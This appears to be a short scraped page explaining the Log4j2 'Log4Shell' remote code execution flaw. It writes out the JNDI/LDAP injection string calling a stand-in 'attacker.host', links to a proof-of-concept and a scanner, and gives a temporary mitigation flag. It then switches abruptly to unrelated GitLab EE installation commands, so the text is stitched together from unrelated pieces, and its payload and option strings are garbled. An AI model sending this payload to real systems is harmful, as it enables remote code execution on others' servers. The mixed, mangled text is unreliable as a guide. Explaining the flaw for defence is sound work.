
How it’s work:
- We send a specially formed request like $ {jndi: ldap: //attacker.host/blabla} to any place that can potentially be logged.
- JNDI (Java Naming and Directory Interface), in turn, processes the template, requests data via LDAP from attacker.host
- In the response, a JAVA class is given, which allows you to execute arbitrary code.
PoC: https://github.com/tangxiaofeng7/apache-log4j-poc
Log4j2 RCE BurpSuite Plugin: https://github.com/whwlsfb/Log4j2Scan
What companies affected: https://github.com/YfryTchsGD/Log4jAttackSurface
Temporary fix: JAVA_OPTS = “- Dlog4j.formatMsgNoLookups = true”
If you got “Unable to locate package gitlab-ee” error message, as displayed on the screenshot below

Make the following two commands:
Note: Don’t forget to change the domain.
- curl -L -o gitlab-ee_13.0.6.deb https://packages.gitlab.com/gitlab/gitlab-ee/packages/debian/buster/gitlab-ee_13.0.6-ee.0_amd64.deb/download.deb
- sudo EXTERNAL_URL=”http://gitlab.mcnz.com" apt install ./gitlab-ee_13.0.6.deb